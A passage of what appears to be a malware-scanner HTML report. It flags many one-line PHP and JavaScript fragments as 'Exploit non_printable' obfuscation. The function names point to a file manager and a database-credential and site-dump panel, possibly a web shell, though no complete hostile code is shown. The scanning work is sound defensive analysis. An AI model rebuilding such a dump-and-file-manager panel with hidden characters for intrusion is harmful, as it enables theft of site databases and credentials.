</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveDbCreds</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$p </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$r </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">) === </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFetchJson</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusApplyRowClass</span><span style="color: #007700">(</span><span style="color: #0000BB">row</span><span style="color: #007700">, </span><span style="color: #0000BB">status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusChanged</span><span style="color: #007700">(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_normalize_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteUpdateSaveStatusesButton</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCollectStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2481</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">map</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveAllStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2518</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFilterByStatus</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2523</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">row</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2537</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbSetFields</span><span style="color: #007700">(</span><span style="color: #0000BB">f</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$real</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2546</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2572</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbFillFromSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">(</span><span style="color: #0000BB">extra</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 257</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fd</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">, </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fetch</span><span style="color: #007700">(</span><span style="color: #0000BB">APP_ENDPOINT_URL </span><span style="color: #007700">|| </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location</span><span style="color: #007700">.</span><span style="color: #0000BB">href</span><span style="color: #007700">, { </span><span style="color: #0000BB">method</span><span style="color: #007700">: </span><span style="color: #DD0000">'POST'</span><span style="color: #007700">, </span><span style="color: #0000BB">body</span><span style="color: #007700">: </span><span style="color: #0000BB">fd</span><span style="color: #007700">, </span><span style="color: #0000BB">credentials</span><span style="color: #007700">: </span><span style="color: #DD0000">'same-origin' </span><span style="color: #007700">})</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">json</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">j</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 259</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'p:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">blob</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">blob</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fname</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">fname</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'n:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpManual</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2634</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpSite</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSiteSnippet</span><span style="color: #007700">(</span><span style="color: #0000BB">siteName</span><span style="color: #007700">, </span><span style="color: #0000BB">cms</span><span style="color: #007700">, </span><span style="color: #0000BB">siteUrl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2666</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">({</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$resolved</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">alert</span><span style="color: #007700">(</span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpAllSites</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">next</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_RUNTIME_BASE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">extIcon</span><span style="color: #007700">(</span><span style="color: #0000BB">ext</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'sys_get_temp_dir'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_extIcons</span><span style="color: #007700">[</span><span style="color: #0000BB">e</span><span style="color: #007700">] || </span><span style="color: #DD0000">'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2723</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openFM</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">siteName</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'fm-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2734</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmLoad</span><span style="color: #007700">(</span><span style="color: #0000BB">dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFMList</span><span style="color: #007700">(</span><span style="color: #0000BB">items</span><span style="color: #007700">, </span><span style="color: #0000BB">current</span><span style="color: #007700">, </span><span style="color: #0000BB">root</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2758</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">item</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmOpenFile</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">size</span><span style="color: #007700">, </span><span style="color: #0000BB">ext</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmStartEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2850</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2855</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmSaveFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">(); </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">''</span><span style="color: #007700">; }, </span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
